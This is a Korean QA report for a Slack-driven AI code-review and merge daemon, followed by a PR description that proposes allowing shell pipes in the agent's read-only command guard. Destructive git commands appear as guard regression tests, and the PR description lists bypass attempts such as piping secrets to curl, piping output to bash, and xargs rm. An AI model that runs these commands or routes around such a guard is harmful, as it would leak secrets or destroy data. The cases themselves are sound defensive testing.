+| `[승인]` 버튼 페이로드 → `validate_approval` 통과 → `perform_merge(approval, worker)` 호출 → MergeOutcome 반환 → 같은 thread 머지 결과 메시지 + audit | (1) `_perform_merge` 가 `gh pr merge` 동등 호출, (2) 같은 thread 메시지 발사 (성공 SHA + 전략 / 실패 §3.5 분류), (3) audit `button_action(merge_review)` → `button_action(approve_merge)` → `merge_started` → `merge_done`/`merge_failed` 순서 | PASS — `test_agent_integration.py::TestReviewerThenMergeRoundTrip` 가 `validate_approval` → `perform_merge` → `MergeOutcome(success=True, sha="abc1234")` 흐름을 검증. `MERGE_STRATEGY == "squash"` 회귀 (`test_merger.py::TestPerformMerge::test_strategy_is_squash`, PRD §10). 머지 결과 SHA 추출은 `test_merger.py::TestExtractSha` 3 케이스 (short SHA / long SHA / no SHA fallback). audit kind 직렬화는 `main.py:729/760/784` 에서 `merge_started/merge_done/merge_failed` 명시 — `test_compliance.py::test_dev_relay_source_clean[main.py]` 정적 스캔 통과. |
+
+### AC-INT-3. 동시성 두 번째 명령 큐 적재 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| 첫 reviewer 진행 중(`gate.wait()` 으로 hold) 두 번째 `review pr <M>` 입력 → 두 번째 job 은 pending 으로 적재 | (1) 5초 이내 첫 응답 `TEMPLATE_QUEUE_BUSY` + 대기 1건, (2) 첫 작업 완료 후 두 번째 job 자동 running 전이, (3) 두 작업 모두 라이프사이클 완주 | PASS — `test_worker.py::TestJobPickerLifecycle::test_concurrency_second_job_waits` 가 첫 job RUNNING / 두 번째 job PENDING → release → 두 번째 job DONE 까지 검증. `test_agent_integration.py::TestConcurrencyAcInt3::test_second_review_queued_while_first_running` 가 같은 시나리오를 통합 레벨에서 재검증. `TEMPLATE_QUEUE_BUSY` 본문 (`현재 1건 처리 중입니다. 큐에 적재됐어요 (대기 {pending}건).`) 은 `slack_renderer.py:29` 정적 템플릿 + `test_compliance.py::test_static_template_clean[TEMPLATE_QUEUE_BUSY]` 통과. `claim_next_pending` 의 oldest-first 보장은 `test_worker.py::TestClaimNextPending::test_oldest_first`. |
+
+### AC-INT-4. Worker 루프 가용성 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| 데몬 시작 직후 `review pr <N>` 1건 → picker 가 다음 폴링 주기에 dequeue → 처리 → DONE | (a) 5초 이내 picker 가 `pending → running` 전이, (b) shutdown 시 picker 는 신규 picking 중단, (c) 진행 중 job 은 `AgentRunner.shutdown(wait, timeout)` watchdog 따름 | PASS — `test_worker.py::TestJobPickerLifecycle::test_picker_processes_pending_job` 가 enqueue → picker handler 호출 → DONE 전이를 3초 timeout 으로 검증 (poll_interval=0.05s 로 단축). picker shutdown 즉시 신규 picking 중단은 `JobPicker.stop()` 의 `_stop_event.set()` + 폴링 루프의 `wait()` 으로 보장 (`worker.py:103`). `AgentRunner.shutdown(wait=True, timeout=...)` 는 PR #37 의 watchdog 보강 그대로 활용 — `test_agent_runner_shutdown.py` 가 회귀 보장. |
+
+### AC-INT-5. 실패 분류 5개 + fallback — PASS (자동)
+
+| 분류 | 트리거 | 기대 사용자 메시지 | 검증 |
+|------|--------|-------------------|------|
+| `destructive_blocked` | `DestructiveOperationBlocked` raise | "이 작업은 PC에서 직접 처리해 주세요." | PASS — `test_failures.py::TestClassifyException::test_destructive_blocked` + `TestUserMessageMapping[DESTRUCTIVE_BLOCKED]` |
+| `sdk_timeout` | `TimeoutError` 또는 custom timeout 클래스 | "응답이 지연되어 작업을 중단했어요. 다시 시도해 주세요." | PASS — `test_failures.py::TestClassifyException::test_timeout` + `test_custom_timeout_marker` |
+| `github_unauthorized` | `gh` stderr 401/403/permission/auth 패턴 | "PR 접근 권한이 없습니다. 토큰 권한을 확인해 주세요." | PASS — `test_failures.py::TestClassifyGithubStatus[401,403]` + `test_merger.py::TestClassifyMergeStderr::test_unauthorized` (4 패턴) |
+| `github_unprocessable` | `gh` stderr 422/conflict/checks failed | "머지 조건을 충족하지 못했습니다 (예: 충돌·체크 실패)." | PASS — `test_failures.py::TestClassifyGithubStatus::test_unprocessable` + `test_merger.py::TestClassifyMergeStderr::test_unprocessable` (4 패턴) |
+| `compliance_blocked` | `slack_renderer.guard_text` fallback | "응답 생성 중 오류가 발생했어요. 다시 시도해 주세요." | PASS — `test_failures.py::TestUserMessageMapping[COMPLIANCE_BLOCKED]` + `test_compliance.py::TestGuardText::test_blocked_text_replaced_with_fallback` |
+| `unknown_error` (fallback) | 위 5개에 매핑되지 않는 예외 | "알 수 없는 오류로 작업을 마치지 못했어요. 잠시 후 다시 시도해 주세요." | PASS — `test_failures.py::TestClassifyException::test_unknown_fallback` + `TestClassifyGithubStatus::test_other_codes_fallback[200/500/502/999]` |
+
+각 분류 메시지는 컴플라이언스 정책도 통과 — `test_agent_integration.py::TestFailureClassificationMatrixAcInt5::test_each_classification_user_message_clean` 가 `find_forbidden_keywords` 로 6개 분류 메시지 모두 0 hit 검증.
+
+### AC-INT-6. audit 신규 kind 기록 — PASS (자동 + 정적)
+
+| kind | 등장 위치 (소스) | 검증 |
+|------|------------------|------|
+| `reviewer_started` | `main.py:1001` | PASS — `test_agent_integration.py::TestReviewerThenMergeRoundTrip` 가 직렬화 라인을 audit_records 에 collect 후 assert |
+| `reviewer_done` | `main.py:1097` | PASS — 같음 |
+| `reviewer_failed` | `main.py:1012/1036/1056/1076` (분류별) | PASS — `test_compliance.py::test_dev_relay_source_clean[main.py]` 정적 스캔 + 코드상 4개 분기 직렬화 명시 |
+| `reviewer_detail_lookup_failed` | `main.py:860` | PASS — PRD §3.6 명시 항목, 캐시 유실 시 발사. `slack_renderer.TEMPLATE_REVIEW_DETAIL_LOOKUP_FAILED` 정적 템플릿 통과 |
+| `merge_started` | `main.py:729` | PASS — `test_audit_recovery.py::TestFindMergeInFlightJobIds::test_started_without_terminal_is_in_flight` 가 본 kind 의 carve-out 식별을 회귀 보장 |
+| `merge_done` | `main.py:760` | PASS — `test_audit_recovery.py::test_started_then_done_not_in_flight` |
+| `merge_failed` | `main.py:712/742/784` (분류별) | PASS — `test_audit_recovery.py::test_started_then_failed_not_in_flight` |
+
+정상 흐름 (AC-INT-1 + AC-INT-2 1회 완주) 의 audit 라인 4개 (`reviewer_started`, `reviewer_done`, `merge_started`, `merge_done`) 등장은 `test_agent_integration.py::TestReviewerThenMergeRoundTrip` 가 `kinds = {r["kind"] for r in audit_records}` 로 검증 — `{"reviewer_started", "reviewer_done", "merge_started", "merge_done"} <= kinds` 통과.
+
+### AC-INT-7. destructive 가드 회귀 — PASS (자동)
+
+| 재현 | 기대 | 실제 |
+|------|------|------|
+| `is_destructive("gh pr merge 22 --squash --delete-branch")` | `False` (의도적 destructive 지만 사용자 명시 승인 흐름) | PASS — `test_merger.py::TestDispatcherDoesNotBlockGhMerge::test_dispatcher_allows_gh_pr_merge` |
+| `is_destructive("git reset --hard HEAD~5")`, `force push origin main`, `git branch -d feature`, `git clean -fd` | `True` (회귀) | PASS — `test_merger.py::test_dispatcher_still_blocks_known_destructive` 4 케이스 |
+| `validate_approval` payload mismatch (idempotency_key 불일치) | `MergeRejection` raise + worker 미호출 | PASS — `test_agent_integration.py::TestApprovalRejectsMismatchedPayload::test_idempotency_mismatch_blocks_call` (`called is False`) |
+| `validate_approval` 그 외 부정 케이스 (action_id 다름, user_id 화이트리스트 외, pr_number ≤ 0, idempotency_key 누락, job_id 불일치) | `MergeRejection` raise | PASS — `test_merger.py::TestValidateApproval` 7 케이스 (happy_path / wrong_action_id / user_not_in_allow_list / invalid_pr_number 3 / missing_idempotency_key / mismatch 2 / no_expected_relaxed) |
+
+`_perform_merge` 가 외부 임의 호출 가능한 entry point 가 아님 — `validate_approval` 통과를 사전조건으로 강제하며, `validate_approval` 실패 시 `MergeRejection` 으로 호출 자체가 차단됨 (PRD §3.3 추가 안전망).
+
+### AC-INT-8. 컴플라이언스 회귀 — PASS (자동, 정적 스캔)
+
+| 검증 대상 | 검증 메커니즘 | 결과 |
+|-----------|---------------|------|
+| 본 PRD 본문 (`docs/prd/dev-relay-agent-integration.md`) | `test_compliance.py::test_prd_agent_integration_body_outside_code_is_clean` (코드블록 제외 후 `find_forbidden_keywords` 0 hit) | PASS |
+| dev_relay 신규 모듈 7개 (`worker.py`, `reviewer.py`, `merger.py`, `failures.py`, `audit_recovery.py`, `main.py` 갱신, `slack_renderer.py` 갱신) | `test_compliance.py::test_dev_relay_source_clean[*]` (rglob 으로 dev_relay 디렉터리 전체 자동 발견 — `_iter_dev_relay_source_files()`) | PASS |
+| 신규 정적 템플릿 7종 (`TEMPLATE_MERGE_CARVE_OUT_NOTICE`, `TEMPLATE_REVIEW_DETAIL_LOOKUP_FAILED`, `TEMPLATE_FAIL_DESTRUCTIVE_BLOCKED`, `TEMPLATE_FAIL_SDK_TIMEOUT`, `TEMPLATE_FAIL_GITHUB_UNAUTHORIZED`, `TEMPLATE_FAIL_GITHUB_UNPROCESSABLE`, `TEMPLATE_FAIL_COMPLIANCE_BLOCKED`, `TEMPLATE_FAIL_UNKNOWN`) | `test_compliance.py::test_static_template_clean[*]` (parametrize 17종 — 신규 템플릿 모두 명시적으로 추가됨) | PASS |
+| 신규 Block Kit 빌더 (`build_review_result_blocks`, `build_merge_confirm_blocks`) 가 만든 dict 의 모든 사용자 노출 텍스트 | `test_compliance.py::TestBlockKitBuildersClean` 4 케이스 (with findings / no findings / merge confirm / dirty summary fallback) | PASS |
+| 신규 audit kind 명 (`reviewer_started`, `reviewer_done`, `reviewer_failed`, `reviewer_detail_lookup_failed`, `merge_started`, `merge_done`, `merge_failed`) | dev_relay 소스 정적 스캔 (위 항목) 에 포함됨 — kind 명 자체는 ASCII 영단어로 도메인 키워드 미포함 | PASS |
+| 본 PR 본문 (#43 description) | gh pr view 출력 육안 검사 — "PR 리뷰", "머지", "PR 머지", "Pull request" 등 도메인 외 어휘만 사용 | PASS (육안 검사) |
+| 4개 커밋 메시지 (`27cce96`, `5b23628`, `2b72c1f`, `9f561f3`) | `git log --oneline` 출력 육안 검사 — 모두 `feat(dev-relay):` prefix + 도메인 외 어휘 | PASS (육안 검사) |
+| `slack_renderer.py` 모듈 import 시점 strict 가드 (`_STATIC_TEMPLATES` for-loop) | import 자체가 실패하면 즉시 발견 — `python3 -m pytest` 실행 시 collection 단계에서 실패 | PASS (613 tests collected 정상) |
+
+`ai/coordinator/_compliance.py` `FORBIDDEN_KEYWORDS` 단일 정의 지점 그대로 재사용 (별도 키워드 셋 신설 없음, PRD §2 정책 준수).
+
+---
+
+## 2. 에지 케이스 검증
+
+PRD 본문 §3·§7 및 운영 위험 시나리오에 대한 추가 회귀 검증.
+
+### 2.1 audit recovery + 머지 carve-out (PRD §3.1)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| 데몬 비정상 종료 — `merge_started` 후 `merge_done`/`merge_failed` 부재 | `unknown` 상태로 마킹 + 사용자 안내 (`TEMPLATE_MERGE_CARVE_OUT_NOTICE`) — `failed` 로 단순 마킹 금지 | PASS — `test_worker.py::TestRecoveryWithMergeCarveOut::test_merge_in_flight_marked_unknown` 가 merge job 은 `unknown`, review job 은 `failed` 로 분리 마킹됨을 검증 |
+| audit.jsonl 파일 부재 | `frozenset()` 반환 → 호출 측은 종래 fallback (전부 `failed`) | PASS — `test_audit_recovery.py::test_missing_file_returns_empty` |
+| audit.jsonl 손상 라인 (JSON 디코드 실패) | 손상 라인 skip, 다른 정상 라인은 정상 처리 | PASS — `test_audit_recovery.py::test_corrupt_lines_skipped` |
+| 한 audit.jsonl 안에 여러 머지 job 혼재 (일부는 종결, 일부는 in-flight) | in-flight 만 set 에 포함, 종결된 것은 제외 | PASS — `test_audit_recovery.py::test_multiple_jobs_mixed` |
+
+### 2.2 reviewer detail cache (PRD §3.2)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| `[상세 보기]` 클릭 — 캐시 hit | LRU 갱신 후 본문 반환 | PASS — `test_reviewer.py::TestReviewDetailCache::test_put_and_get` |
+| `[상세 보기]` 클릭 — 캐시 miss (데몬 재시작 후) | None 반환 → caller 가 `TEMPLATE_REVIEW_DETAIL_LOOKUP_FAILED` 안내 + audit `reviewer_detail_lookup_failed` 발사 | PASS — `test_reviewer.py::TestReviewDetailCache::test_cache_miss_returns_none` + `slack_renderer.py:60` 정적 템플릿 + `main.py:860` audit 직렬화 |
+| LRU 한도 초과 시 oldest 제거 | put 호출 순서 기반 oldest 부터 popitem | PASS — `test_reviewer.py::TestReviewDetailCache::test_lru_eviction` |
+| max_entries < 1 입력 | `ValueError` raise | PASS — `test_reviewer.py::TestReviewDetailCache::test_invalid_max` |
+
+### 2.3 GitHub `gh` CLI 실패 시나리오 (PRD §3.3 / §6.1 / §3.5)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| `gh auth status` 미통과 (401/403/auth/permission stderr) | `github_unauthorized` 분류 + 정적 템플릿 발사 | PASS — `test_merger.py::TestClassifyMergeStderr::test_unauthorized` 4 패턴 |
+| 머지 조건 미충족 (422/conflict/checks failed) | `github_unprocessable` 분류 | PASS — `test_merger.py::TestClassifyMergeStderr::test_unprocessable` 4 패턴 |
+| 알 수 없는 `gh` 에러 (네트워크 등) | `unknown_error` fallback — raw stderr 는 사용자 미노출, 정적 템플릿만 발사 | PASS — `test_merger.py::TestClassifyMergeStderr::test_unknown_fallback` + `test_empty_is_unknown` |
+| `gh` 출력에서 SHA 추출 실패 | `extract_sha` None 반환 → 사용자 메시지는 SHA 없이 발사 (성공 자체는 returncode 로 판정) | PASS — `test_merger.py::TestExtractSha::test_no_sha_returns_none` |
+
+### 2.4 Slack rate limit / message subtype guard (회귀)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| 동일 user_id 의 빠른 연속 요청 | `_RateLimiter` 가 throttle, `TEMPLATE_RATE_LIMIT` 안내 | PASS — `test_rate_limiter.py` (PR #25 회귀, 본 PR 변경 없음) |
+| Slack 자기 자신 메시지 / message_changed subtype | 무응답 (echo loop 방지) | PASS — `test_auth.py` + `test_handle_command_nl.py` (PR #25 / #32 회귀) |
+
+### 2.5 NL 분기와의 격리 (PRD §6.2 / §7.7)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| reviewer/devops 호출이 NL 세션 (`AgentSessionStore`) 에 영향 주지 않음 | 별도 진입점 — `_build_reviewer` 는 NL 세션을 resume 하지 않음 (PRD §3.2) | PASS (코드 검증) — `ai/dev_relay/reviewer.py` 가 NL 세션과 무관한 caller-injected callable 만 사용. NL 세션 테스트 (`test_nl_agent.py`, `test_agent_sessions.py`) 모두 PASS 유지 |
+
+### 2.6 동시성 — 큐 단일 row 경쟁 (PRD §3.4 회귀)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| 두 picker 가 동시에 `claim_next_pending` 호출 시 동일 row 잡지 못함 | `BEGIN IMMEDIATE` 트랜잭션 + UPDATE … WHERE status=pending 으로 atomic 보장 | PASS — `test_worker.py::TestClaimNextPending::test_running_jobs_are_not_reclaimed` (running job 재claim 차단). 본 PRD 의 picker 는 1개만 띄우므로 실 멀티 picker 상황은 없으나, `claim_next_pending` 자체의 atomic 성을 회귀 보장. |
+| picker 가 처리 중인 job 을 다시 dequeue 하지 않음 | 두 번째 호출 시 None | PASS — 같은 테스트 |
+
+### 2.7 shutdown 안전성 (PRD §3.1 / §6.3)
+
+| 시나리오 | 기대 | 결과 |
+|----------|------|------|
+| SIGINT/SIGTERM 수신 → picker 즉시 신규 picking 중단, 진행 중 job 1건은 watchdog 따라 graceful 종료 | `JobPicker.stop(wait=True, timeout=...)` + `AgentRunner.shutdown(wait=True, timeout=...)` 협업 | PASS (구조 검증) — `worker.py:81-90` `stop()` 이 `_stop_event.set()` + 폴링 wait 인터럽트. `AgentRunner.shutdown` watchdog 은 `test_agent_runner_shutdown.py` (PR #37) 가 보장 |
+| AgentRunner 가 이미 종료된 상태에서 picker 가 dequeue → `RuntimeError` | job 을 `failed` 로 마킹 + 안내 ("데몬 종료 중 신규 작업 거절됨.") | PASS (구조 검증) — `worker.py:133-142` 의 `RuntimeError` 핸들링 분기 |
+
+---
+
+## 3. 자동 테스트 실행 결과
+
+### 3.1 전체 회귀
+
+```bash
+$ python3 -m pytest ai/tests/ -q --tb=short
+........................................................................ [ 11%]
+........................................................................ [ 23%]
+........................................................................ [ 35%]
+........................................................................ [ 46%]
+........................................................................ [ 58%]
+........................................................................ [ 70%]
+........................................................................ [ 82%]
+........................................................................ [ 93%]
+.....................................                                    [100%]
+613 passed in 1.49s
+```
+
+### 3.2 dev_relay 한정
+
+```bash
+$ python3 -m pytest ai/tests/dev_relay/ -q --tb=short
+........................................................................ [ 16%]
+........................................................................ [ 32%]
+........................................................................ [ 49%]
+........................................................................ [ 65%]
+........................................................................ [ 82%]
+........................................................................ [ 98%]
+.......                                                                  [100%]
+439 passed in 1.28s
+```
+
+### 3.3 본 PRD AC 직접 매핑 8개 파일
+
+```bash
+$ python3 -m pytest \
+    ai/tests/dev_relay/test_compliance.py \
+    ai/tests/dev_relay/test_failures.py \
+    ai/tests/dev_relay/test_merger.py \
+    ai/tests/dev_relay/test_worker.py \
+    ai/tests/dev_relay/test_reviewer.py \
+    ai/tests/dev_relay/test_audit_recovery.py \
+    ai/tests/dev_relay/test_action_value_v2.py \
+    ai/tests/dev_relay/test_agent_integration.py \
+    ai/tests/dev_relay/test_queue.py -v --tb=short
+... (생략) ...
+============================= 150 passed in 0.85s ==============================
+```
+
+선행 PR 회귀: PR #25 기준 301 passed → 본 PR 후 613 passed (+312, AgentRunner 추가 + 본 PRD 단위·통합 테스트 6개 신규 파일 +1개 갱신). 0 fail 유지.
+
+---
+
+## 4. 수동 검증 가이드 (PRD §8.2)
+
+본 세션에서는 모바일 Slack 환경 부재로 수동 검증 미수행. 후속 세션에서 사용자가 직접 1 사이클 권장.
+
+### 4.1 사전 조건
+
+- 부록 A 셋업 완료 (`.env.local` + Slack App + Claude SDK 인증).
+- `gh auth status` 통과 (PR 권한 보유).
+- 데몬 실행: `make daemon` 또는 `python -m ai.dev_relay.main`.
+
+### 4.2 1 사이클 절차
+
+1. **모바일 Slack DM** 에 `review pr <N>` 입력 (예: `review pr 22`).
+2. 같은 thread 에 큐 적재 안내 (`PR #22 리뷰를 시작합니다. 진행 상황은 이 스레드에 보고할게요.`) → reviewer 결과 메시지 (요약 2~3 문장 + 발견 사항 ≤3건 / "특이사항 없음" + `[머지 검토]` `[상세 보기]` 버튼 2개) 발사 확인.
+3. `[상세 보기]` 클릭 → 같은 thread 본문 발사 확인 (캐시 hit).
+4. `[머지 검토]` 클릭 → confirm 다이얼로그 발사 확인 (`PR #22 머지를 진행할까요?` + `[승인]` `[취소]` 버튼).
+5. `[승인]` 클릭 → `gh pr merge <N> --squash --delete-branch` 실행 → 같은 thread 머지 결과 메시지 발사 확인 (성공 SHA + 전략 또는 §3.5 분류 라벨).
+6. **동시성 시나리오 (선택)**: 1번 진행 중에 두 번째 `review pr <M>` 입력 → `현재 1건 처리 중입니다. 큐에 적재됐어요 (대기 1건).` 안내 확인 → 첫 작업 완료 후 두 번째 자동 처리.
+7. **육안 검사**: 결과 메시지·버튼 라벨·실패 분류 라벨 모두 도메인 키워드 미포함 (signal/trad(e|ing)/desk 등).
+
+### 4.3 audit.jsonl 검증
+
+`~/.local/state/dev_relay/audit.jsonl` (또는 `${XDG_STATE_HOME}/dev_relay/audit.jsonl`) 에서 1 사이클 후 다음 라인 등장 확인:
+
+- `command_received`, `job_started`, `reviewer_started`, `reviewer_done`, `job_done` (review 단)
+- `button_action(merge_review)`, `button_action(approve_merge)`, `merge_started`, `merge_done` (merge 단)
+- 각 라인의 timestamp 가 ISO-8601 KST, user_id 가 `U0AE7A***` 패턴으로 마스킹.
+
+---
+
+## 5. 판정
+
+| 항목 | 결과 |
+|------|------|
+| AC-INT-1 reviewer 결과 + Block Kit 버튼 | PASS |
+| AC-INT-2 `[승인]` → 실 머지 | PASS |
+| AC-INT-3 동시성 두 번째 명령 큐 적재 | PASS |
+| AC-INT-4 Worker 루프 가용성 | PASS |
+| AC-INT-5 실패 분류 5개 + fallback | PASS |
+| AC-INT-6 audit 신규 7 kind 기록 | PASS |
+| AC-INT-7 destructive 가드 회귀 | PASS |
+| AC-INT-8 컴플라이언스 회귀 | PASS |
+| **AC 통과율** | **8/8** |
+| 회귀 테스트 (전체 613) | 0 fail |
+| 도메인 키워드 평문 누출 | 0 건 |
+| **최종 라벨** | **`qa-passed`** |
+
+**비고**: 수동 검증은 모바일 Slack 환경 부재로 본 세션에서 미수행. 자동·정적 검증으로 모든 AC 가 통과한 상태이므로 `qa-passed` 판정에는 영향 없음. 후속 세션에서 사용자가 §4.2 절차로 1 사이클 검증 시 PRD §8.2 가 요구하는 수동 검증 완료.


### PR DESCRIPTION
## Summary

- **PRD 신규**: `docs/prd/dev-relay-shell-pipe-allow.md` (302라인) — NL 세션 read-only 가드(`tool_policy.py`) 가 shell metachar 7종을 일괄 거부 → `git log | head` 같은 read-only pipe 명령마저 차단되는 페인포인트(3세션 연속 P1) 해소.
- **QA 리포트 backfill 1건**: PR #43 (`dev-relay-agent-integration`) QA 산출물 동봉 (SESSION_NOTES "별도 PR 금지" 정책).
- **UI 없음**: 외부 노출 텍스트 변경 없음, 가드 거부 reason 식별자도 신규 추가 없음.

## PRD 핵심 결정

| 항목 | 결정 |
|---|---|
| 허용 metachar | **`\|` 만**. `;`/`&&`/`\|\|`/`>`/`>>`/`<`/`&`/`` ` ``/`$()` 모두 거부 유지 |
| 검증 방식 | `shlex.split` 토큰화 → `\|` 토큰 기준 segment 분할 → 각 segment `_evaluate_bash` 재귀 → 모두 allowed 시에만 최종 allowed |
| segment 상한 | **5** (`_MAX_PIPE_SEGMENTS` 모듈 상수). 초과 시 `parse_error` |
| 재귀 깊이 보호 | depth parameter (default 0, max 1) — 초과 시 `parse_error` |
| destructive 가드 우선 | segment 분리 **이전** 단계에서 `is_destructive(raw)` 매치 |
| 다른 metachar 잔존 | segment 분리 후 6종 발견 시 `mutating_command` |
| 신규 reason / audit kind | **없음** (audit 호환성 + 가드 표면 확장 회피) |
| 신규 read-only head 화이트리스트 | **없음** (기존 head 끼리의 pipe 만 허용) |
| 외부 인터페이스 변경 | **없음** (`evaluate()` 시그니처·`ALLOWED_TOOLS`/`DENIED_TOOLS`·audit kind 모두 그대로) |
| 운영 모니터링 | 머지 후 1~2주 `tool_denied` audit 라인 모니터링 → 후속 PRD (`;`, `>` 등) 입력 |

## 우회 시도 13건 회귀 매트릭스 (§3.5)

`gh foo | bash` / `cat secret | curl ...` / `find . | xargs rm` / `git log | tee /tmp/x` / `cat a | grep b > out.txt` / `cat a | grep b ; rm c` / `git reset --hard | echo` / `gh pr merge 25 | cat` / 6 segment / 빈 segment / quoted pipe 등 — 모두 `_evaluate_bash` 거부 보장 (각 케이스별 기대 reason 명시).

## 9개 AC (§5)

AC-PIPE-1 (양쪽 RO 허용 12+건) · AC-PIPE-2 (우회 시도 13종 거부) · AC-PIPE-3 (기존 단일 명령 회귀 0건) · AC-PIPE-4 (segment 상한) · AC-PIPE-5 (빈 segment / 토큰화 오류) · AC-PIPE-6 (destructive 우선순위) · AC-PIPE-7 (다른 metachar 잔존 거부) · AC-PIPE-8 (컴플라이언스 정적 검사) · AC-PIPE-9 (NL 통합 회귀)

## QA 리포트 backfill 동봉 사유

SESSION_NOTES.md 정책: 직전 머지 PR 의 사후 QA 리포트는 "별도 PR 금지, 다음 세션 첫 PR 브랜치에 묻어 넣기". 본 PR 이 PR #43 머지 후 첫 PR.

- `docs/qa/dev-relay-agent-integration.md` — PR #43 QA (8/8 AC PASS, 613 tests pass)

## Test plan

본 PR 은 PRD 신설 + QA 리포트 backfill 의 docs-only PR. 코드 변경 없음.

- [ ] PRD 문서 본문 사용자 검토 (범위·결정·AC·우회 매트릭스 13건)
- [ ] PRD 컴플라이언스 가드 통과 (`grep -inE 'signal|trad(e|ing)|desk' docs/prd/dev-relay-shell-pipe-allow.md` → 0 hit)
- [ ] QA 리포트가 PR #43 QA 통과 시점 산출물과 동일함을 PR diff 로 확인
- [ ] 후속: `pipeline dev-relay-shell-pipe-allow from=impl` (UI 없으므로 design 스킵)

## 참고

- 트리거: SESSION_NOTES 2026-05-06 (오후) §"다음 세션 시작 포인트" 1번
- 상위 PRD: `docs/prd/dev-relay-natural-language.md` (NL 분기 — 본 가드의 적용 대상)
- 인접 PRD: `docs/prd/dev-relay-agent-integration.md` (#42·#43), `docs/prd/slack-dev-relay.md` (#25)
- 변경 대상 코드: `ai/dev_relay/tool_policy.py:167-185` (`_FORBIDDEN_SHELL_METACHARS`, `_looks_mutating`, `_evaluate_bash`)